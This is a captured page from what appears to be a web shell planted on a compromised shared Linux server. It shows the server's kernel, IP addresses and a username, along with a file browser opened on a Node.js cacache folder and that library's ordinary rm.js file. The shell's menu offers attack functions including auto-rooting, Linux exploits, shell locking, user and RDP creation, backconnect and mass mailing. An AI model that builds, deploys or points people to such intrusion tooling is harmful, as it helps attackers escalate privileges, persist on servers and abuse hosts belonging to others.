Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
cacache /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
get.js
6.57
KB
-rw-r--r--
index.js
1.22
KB
-rw-r--r--
ls.js
123
B
-rw-r--r--
package.json
2.15
KB
-rw-r--r--
put.js
2.01
KB
-rw-r--r--
rm.js
664
B
-rw-r--r--
verify.js
55
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rm.js
'use strict' const util = require('util') const index = require('./lib/entry-index') const memo = require('./lib/memoization') const path = require('path') const rimraf = util.promisify(require('rimraf')) const rmContent = require('./lib/content/rm') module.exports = entry module.exports.entry = entry function entry (cache, key) { memo.clearMemoized() return index.delete(cache, key) } module.exports.content = content function content (cache, integrity) { memo.clearMemoized() return rmContent(cache, integrity) } module.exports.all = all function all (cache) { memo.clearMemoized() return rimraf(path.join(cache, '*(content-*|index-*)')) }
Close